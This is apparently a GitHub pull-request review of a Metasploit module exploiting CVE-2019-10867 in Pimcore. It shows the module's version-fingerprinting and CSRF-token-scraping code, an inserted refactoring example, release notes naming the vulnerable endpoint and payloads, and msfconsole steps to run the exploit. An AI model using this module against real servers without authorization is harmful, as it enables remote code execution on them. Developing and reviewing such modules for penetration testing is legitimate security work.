Add Pimcore from 4.0.0 to 5.6.6 Unserialize RCE (CVE-2019-10867) #11697
Conversation
Hi @bcoles, what other documentation do you need in addition to that already shared?
metasploit-framework/modules/exploits/multi/http/pimcore_unserialize_rce.rb
Lines 89 to 134 in deaa66d
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(uri),
      'cookie' => res.get_cookies
    )
    if res && res.code == 200
      # Pimcore 5.x
      # Tested on 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4, 5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0
      unless res.body.scan(/"csrfToken": "[a-z0-9]+",/).empty?
        datastore['csrfToken'] = res.body.scan(/"csrfToken": "([a-z0-9]+)",/).flatten.first.to_s
        datastore['cookies'] = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+;)/).flatten[0] + ' pimcore_admin_sid=1;'
        # Version
        version = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[0]
        build = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[1]
        print_status("Pimcore version: #{version}")
        print_status("Pimcore build: #{build}")
        if Gem::Version.new(version) >= Gem::Version.new('5.0.0') && Gem::Version.new(version) <= Gem::Version.new('5.6.6')
          print_good("The target is vulnerable!")
          return targets[0]
        else
          return nil
        end
      end
      # Pimcore 4.x
      # Tested on 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3, 4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0, 4.0.1, 4.0.0
      unless res.body.scan(/csrfToken: "[a-z0-9]+",/).empty?
        datastore['csrfToken'] = res.body.scan(/csrfToken: "([a-z0-9]+)",/).flatten.first.to_s
        datastore['cookies'] = res.get_cookies.scan(/(pimcore_admin_sid=[a-z0-9]+;)/).flatten[0]
        # Version
        version = res.body.scan(/version: "([0-9]{1}\.[0-9]{1}\.[0-9]{1})",/i).flatten[0]
        build = res.body.scan(/build: "([0-9]+)",/i).flatten[0]
        print_status("Pimcore version: #{version}")
        print_status("Pimcore build: #{build}")
        if Gem::Version.new(version) >= Gem::Version.new('4.0.0') && Gem::Version.new(version) <= Gem::Version.new('4.6.5')
          print_good("The target is vulnerable!")
          return targets[1]
        else
          return nil
        end
      end
      return nil
I'd suggest maybe placing all of the version-checking functionality in login() into a new function and utilizing that function in check(). It would both reduce the login() function and help check() better determine target exploitability.
Most of the code I'm referencing is linked above.
Hi space-r7! It is not possible to do what you suggest because:
- to determine the version number you need to log in (so it leaves a trace on the target; not recommended by the documentation of the check function).
- determining the version number is necessary in order to complete the login, save the right cookies and grab the CSRF token.
We could simplify the login function with several small functions such as: grab cookie, grab token, check version and set msf target. What do you think about it?
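The refactoring the two comments above discuss, as an added example that is not the module's own code: the version fingerprint and CSRF-token extraction are pulled out of login() into small pure helpers that operate on an already-fetched page body, and the vulnerable ranges are kept in one table. The sample bodies are constructed here to mirror the two page formats the quoted regexes match (5.x embeds "pimcore platform (vX.Y.Z|build)", 4.x embeds version: "X.Y.Z", build: "N"); the function names are assumptions. One deliberate generalization: the quoted regexes use [0-9]{1} per version component, so a version such as 5.10.0 would never match and the module would fall through to "not vulnerable"; the helper below uses \d+ instead.

```ruby
# Added example, not code from the metasploit-framework module. Shows how the
# version check in login() could be factored into small helpers usable by check().
require 'rubygems' # Gem::Version (already loaded by default in modern Ruby)

# Vulnerable ranges exactly as the quoted login() encodes them.
PIMCORE_VULNERABLE_RANGES = {
  '5.x' => [Gem::Version.new('5.0.0'), Gem::Version.new('5.6.6')],
  '4.x' => [Gem::Version.new('4.0.0'), Gem::Version.new('4.6.5')]
}.freeze

# Constructed sample bodies (not captured from a real server).
SAMPLE_BODY_5X = '<script>pimcore.settings = {"csrfToken": "9f2e1c7a5b3d", "version": "pimcore platform (v5.6.6|f00ba7)"};</script>'
SAMPLE_BODY_4X = '<script>pimcore.settings = { csrfToken: "4d5e6f7a8b9c", version: "4.6.5", build: "3456", };</script>'
SAMPLE_BODY_PATCHED = '<script>pimcore.settings = {"csrfToken": "0a1b2c3d4e5f", "version": "pimcore platform (v5.7.1|c0ffee)"};</script>'
SAMPLE_BODY_TWO_DIGIT = '<script>pimcore.settings = {"csrfToken": "a0b1c2d3e4f5", "version": "pimcore platform (v5.10.0|abc123)"};</script>'

# Helper "grab version": returns { branch:, version:, build: } or nil when the
# body matches neither the 5.x nor the 4.x layout.
# \d+ per component so multi-digit releases are recognised (the quoted code used [0-9]{1}).
def extract_pimcore_version(body)
  if (m = body.match(/"pimcore platform \(v(\d+\.\d+\.\d+)\|([a-z0-9]+)\)"/i))
    return { branch: '5.x', version: m[1], build: m[2] }
  end
  if (m = body.match(/version: "(\d+\.\d+\.\d+)",/i))
    build = body.match(/build: "([0-9]+)",/i)
    return { branch: '4.x', version: m[1], build: build ? build[1] : nil }
  end
  nil
end

# Helper "grab token": the 5.x page quotes the key ("csrfToken": "..."), the
# 4.x page does not (csrfToken: "..."); one optional-quote pattern covers both.
def extract_csrf_token(body)
  m = body.match(/"?csrfToken"?: "([a-z0-9]+)",/)
  m && m[1]
end

# Helper "check version": true only when the parsed version falls inside the
# vulnerable range for its branch. Malformed version strings are treated as
# not vulnerable rather than raising out of check().
def vulnerable_version?(info)
  return false if info.nil?
  low, high = PIMCORE_VULNERABLE_RANGES.fetch(info[:branch])
  v = Gem::Version.new(info[:version])
  v >= low && v <= high
rescue ArgumentError
  false
end

# What a check() method would want back: :unknown when the version cannot be
# read (no claim either way), otherwise :vulnerable or :safe.
def assess_pimcore(body)
  info = extract_pimcore_version(body)
  return :unknown if info.nil?
  vulnerable_version?(info) ? :vulnerable : :safe
end

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_BODY_5X, SAMPLE_BODY_4X, SAMPLE_BODY_PATCHED, SAMPLE_BODY_TWO_DIGIT].each do |body|
    info = extract_pimcore_version(body)
    puts "#{info[:branch]} #{info[:version]} build #{info[:build]} token #{extract_csrf_token(body)} => #{assess_pimcore(body)}"
  end
end
```

Because the helpers take a page body rather than issuing requests, they can be unit-tested offline and reused by both login() and check(); whether check() is allowed to fetch that body is exactly the trace-on-target question raised in the comment above, and these helpers leave that decision to the caller.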
That makes sense! That sounds good to me! Thanks!
I just created a PR on your branch for the remaining changes that I think would improve your module. Other than those small changes, this looks good to me. Thank you!
Thank you very much! I've merged your PR.
Thank you!
Add more error handling
Tested on
Release Notes
The multi/http/pimcore_unserialize_rce exploit module has been added to the framework. This module gains remote code execution by exploiting a PHP deserialization vulnerability in Pimcore post authentication for versions prior to 5.7.1.
This module exploits a PHP unserialize() in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability.
The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method makes it possible to exploit the unserialize function when passing untrusted values in the "data" parameter.
References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10867
pimcore/pimcore@38a29e2
https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-173998
This module has been tested successfully on Pimcore 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4, 5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0 with the Symfony unserialize payload and on Pimcore 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3, 4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0, 4.0.1, 4.0.0 with the Zend unserialize payload.
Verification
The steps needed to make sure this thing works:
msfconsole
use exploit/multi/http/pimcore_unserialize_rce
set RHOST <IP>
set USERNAME <USERNAME>
set PASSWORD <PASSWORD>
check
The target service is running, but could not be validated.
exploit
Scenario
Pimcore 5.x
Pimcore 4.x